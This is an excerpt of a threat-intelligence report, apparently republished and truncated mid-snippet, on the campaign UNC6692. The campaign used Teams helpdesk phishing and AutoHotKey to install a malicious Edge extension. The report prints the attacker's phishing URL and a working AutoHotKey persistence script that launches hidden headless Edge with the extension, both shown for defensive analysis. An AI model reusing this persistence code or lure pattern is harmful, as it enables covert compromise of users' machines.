Written by: JP Glab, Tufail Ahmed, Josh Kelley, Muhammad Umair
Introduction
Google Threat Intelligence Group (GTIG) identified a multistage intrusion campaign by a newly tracked threat group, UNC6692, that leveraged persistent social engineering, a custom modular malware suite, and deft pivoting inside the victim’s environment to achieve deep network penetration.
As with many other intrusions in recent years, UNC6692 relied heavily on impersonating IT helpdesk employees, convincing their victim to accept a Microsoft Teams chat invitation from an account outside their organization. The UNC6692 campaign demonstrates an interesting evolution in tactics, particularly the use of social engineering, custom malware, and a malicious browser extension, playing on the victim’s inherent trust in several different enterprise software providers.
Threat Details
In late December 2025, UNC6692 conducted a large email campaign designed to overwhelm the target with messages, creating a sense of urgency and distraction. Following this, the attacker sent a phishing message via Microsoft Teams, posing as helpdesk personnel offering assistance with the email volume.
Infection Chain
The victim was contacted through Microsoft Teams and was prompted to click a link to install a local patch that prevents email spamming. Once clicked, the user’s browser opened an HTML page and ultimately downloaded a renamed AutoHotKey binary and an AutoHotkey script, sharing the same name, from a threat actor-controlled AWS S3 bucket.
"url": "https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com",
"description": "Microsoft Spam Filter Updates | Install the local patch to protect your account from email spamming",Figure 1: Snippet from MS Team Logs
If the AutoHotkey binary is named the same as a script file in its current directory, AutoHotkey will automatically run the script with no additional command line arguments. Evidence of AutoHotKey execution was recorded immediately following the downloads resulting in initial reconnaissance commands and the installation of SNOWBELT, a malicious Chromium browser extension (not distributed through the Chrome Web Store). Mandiant was unable to recover the initial AutoHotKey script.
The persistence of SNOWBELT was established in multiple ways. First, a shortcut to an AutoHotKey script was added to the Windows Startup folder, which verified SNOWBELT was running and that a Scheduled Task was present.
if !CheckHeadlessEdge(){
try{
taskService:=ComObject("Schedule.Service")
taskService.Connect()
rootFolder:=taskService.GetFolder("\")
if FindAndRunTask(rootFolder){
Sleep 10000
if CheckHeadlessEdge(){
ExitApp
}
}
}
Run 'cmd /c start "" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\System Data" --headless=new --load-extension="%LOCALAPPDATA%\Microsoft\Edge\Extension Data\SysEvents" --no-first-run',,"Hide"
}
ExitAppFigure 2: Snippet from AutoHotKey script to verify SNOWBELT was running and to start it if not
Second, two additional scheduled tasks were installed. One task to start a windowless Microsoft Edge process that loads the SNOWBELT extension and another to identify and terminate Microsoft Edge processes that do not have CoreUIComponents.dll loaded.
<Exec>
<Command>
"C:\Program Fil
[...]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from Threat Intelligence
Read the original article: